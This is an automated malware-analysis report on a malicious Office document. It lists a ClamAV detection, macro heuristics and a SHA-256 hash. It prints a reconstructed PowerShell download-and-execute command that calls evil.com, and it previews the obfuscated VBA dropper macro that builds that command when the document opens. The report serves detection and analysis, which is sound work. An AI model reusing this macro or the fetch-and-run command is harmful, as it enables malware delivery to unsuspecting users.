Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro executes a PowerShell command, reconstructed as `powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')"`, which downloads and executes a second-stage payload from a remote URL. This indicates dropper functionality, commonly associated with malware distribution.
Heuristics (6)
- ClamAV: Doc.Dropper.Agent-6607279-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6607279-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16991 bytes |

SHA-256: 18cfd33f2f0148d0ff94bf3baa649a2e017bed46b84665ed0d7dbfdc86a4274f
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "RChzliW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
QrYck = 11882 / WjDwSN - (KhzaSW + sHkZCM)
cYjoD = 64430 / nOFhfz - (mlXuM + akiFTp)
dzslqVsvKJ ("" + VQVECYJFNUv + CQjucDmVf + blZCdWHZO + DBZVs + roflTVj + jnXwjvQot + WGpNvbi + CfaHhJUkmk)
jDXtiH = 59731 / HwjkK - (oGQUp + dSjCh)
ObSFw = 85095 / iUNYKm - (zrSCiI + CshXTD)
End Sub
Attribute VB_Name = "jlhfpZul"
Function blZCdWHZO()
On Error Resume Next
dvWSK = (oPuhXq - aoGiRl)
LlHYk = (FzbUuo - mzKsK)
iQuNbLv = "pow" + iwilHAUD + McZQOoNsCpFtz + "ers" + twqjbYzY + YoZkovqBi + "h" + AYrpDtw + oBacOBi + "ell" + TPDGCqA + OuOsSaEt + " " + qXfwYMYXNwVmQT + OztVBpPl + "&" + rwjAYUb + ioQfuiTmrmcd + " " + GLFzFwBHuOTVcn + BLlmNWwUzr + "( $" + YzHbvzc + VVifauBMY + "sh" + YSkQsJjjNlz + wjuGrZdLY + "el" + qCGmcwIbpCi + rjmPsbhVH + "Lid"
rzvUwY = 38481 / 952 + (FapCw - 13796 * 32357 - YYMTij)
oOkdmknNMS = "[1]" + NTwYJiiYvdBnc + dsIRtjSlKEzi + Chr(43) + "$" + MSfMKKADo + HiBdPpvHdqmXw + "SH" + uhlTMAa + KVaRGhZDNZmF + "El" + vPBaiXav + GQTRVjqjSSTtOd + "L" + QiKYczcaqDKawn + obLqOHidi + "Id" + zoBAXYiHrkIW + tbRYQkiJDFmSL + "[1" + AjqWNdlo + BNjQifFFDVjRF + "3]" + HqkwNFNAwr + ztKHnOkOW + Chr(43) + "'x" + YahMHMbjbXBFm + phnMhZaMFLtOt + "')(" + EwJwMWjsGo + cvwnXGuY + "n" + JQSzNbAOzij + CvooWIohY + "eW-" + wRHYVHwiR + tfOJFsrqocWbv + "Ob" + RYQOslFBzvUc + jBppNCJaNDwqh + "JE" + bpLfmqaNDlEod + lPzAEahmi + "cT " + qLMRBEjMYFI + AJnmEIOf + "s"
ShsjRO = 89938 / 7115 + (pMzOBl - 67446 * 99626 - QqIcS)
vmvhZ = 53738 / 89717 + (MukJYR - 96483 * 56270 - fGuAu)
VJIOW = 82339 / 80834 + (BfWcz - 42165 * 5788 - RVCHA)
HfXzYpBNDNw = "YS" + SMGwLwAAzuMQT + VEVHsvVd + "TE" + tcisfzvhVvJ + CFfVcFJmulNhD + "m." + jswjbUSTV + uQjzkwlKSC + "iO" + tYWqwrRLcU + cwaIZklJNIKsDw + "." + vsMQWTDLE + cEzranlVlX + "s" + iQDLkNdnBqBP + NbJvPDvQ + "t" + QQkFRbP + GdzSHTzbq + "re" + DhHRaJLqIYqS + vTdXVZaJvdiNJC + "Am" + cFzXCiJSf + ZjuQKtVMz + "rEA" + UsLtmin + JNrwlVi + "d" + KLsNKAaB + UnqdwYkELI + "ER" + fSHGMswfpKZ + HLHiLTkQTsMTk + "( " + ARXmQfjZFD + CiiKOqoqMdVA + "(" + OMavmbza + nnjIalBfXl + " ne"
jQabq = DdfXsw + fzPGc * 31349 - iqFnqO / CGiiK / VPlkw / 11079 * ublzFN
ohwcvB = 21222 / 45505 + (WzERUw - 20243 * 32225 - ibDFX)
Tkkrmtukntt = "W" + MzcGlcpKnkbR + BoiZoQMfKW + "-" + DFIhdHiSuhFDls + wLicuEkJXoR + "Ob" + jmGkrZkBGH + icUiinwqljzst + "JE" + VzJoqOuNuzTuTp + DKoMcQatAVZmz + "cT" + qqbOCzSdZ + ZiLtdBMuv + " " + oVFYQoV + QHmcEraW + "s" + hPYNqshHrXZC + lCFJihiHkfw + "yS" + jplaqCJApPHOfi + RiNPHqBmRsK + "tE" + itPYzwSFzj + dwmzvwzzdTwk + "m.I" + tnzJzsCbKWspi + XUzNhitPo + "o" + KJvLwiVJFfGnlG + lPFFPPi + ".C"
lwoSkQ = irWdY + mRpnb * 10060 - ZXbWj / hPEVLp / nKcBtO / 84491 * ROkRbI
hzNnT = NWRlE + DdWLnu * 73512 - potMNm / IrFFW / vWVzCK / 42189 * FjHJJd
zWVJzX = nDitf + aNTZij * 33894 - NGCbHA / PivbpM / HAzGHu / 99150 * YmXmps
rKujzVni = "OM" + djWJfsFBaj + fMjhmIG + "PRe" + ljQfjEmCD + QSbYAlQiPw + "SsI" + LsZXbbXUjrK + FdvoTwWYqoNkHh + "On" + clSJGEnKjLafo + HjbuHUpvzF + ".d" + DMnTuWcDGs + BqkHIXqjDPFAj + "e" + XnpUEAjjztrjJ + RPBktRkinaOV + "F" + GnmIiFQRXdqSG + QrhYVzpzv + "LAT" + nFCupiRvqFE + GSAsXubLwTW + "e" + zwqRorPDRLOd + AKwIMSDR + "StR" + zbBRPqljKJhVFZ + IboGlOjja + "e"
wEFww = ULFBCw + kUXHZl * 97422 - YzcCs / kazoQ / HmnNu / 34359 * GKodz
KJQdf = sTMpzo + ZiSidi * 9223 - qwKbd / LisSqO / aWufBc / 24484 * FYKnM
BjdlBnCX = "Am" + lADNbirYFc + NjlGNlj + "([" + jKMIZsAjVcVMvz + bohPOhkANwXZiQ + "s" + FXEqrFBqqokzYr + LKmwzKjwZLua + "y" + BEPVHXuiEVn + azkcWjnOXi + "sTe" + voGRfKa + nfkCjupcG + "M."
XKBKiF = mbVioJ + IkbNMs * 56481 - EipcY / hGiNPs / bvaiI / 16605 * iJWnm
IlIBo = YuhNia + VMjoRY * 21051 - VJnSA / mlzlQ / GsKfF / 54166 * mjnCIE
cazkzWsd = "IO" + avssDVF + FhSEUrVZRW + "." + AiDjXTvMCqXHi + VWptVcFdbqAN + "M" + NU
```

... (truncated)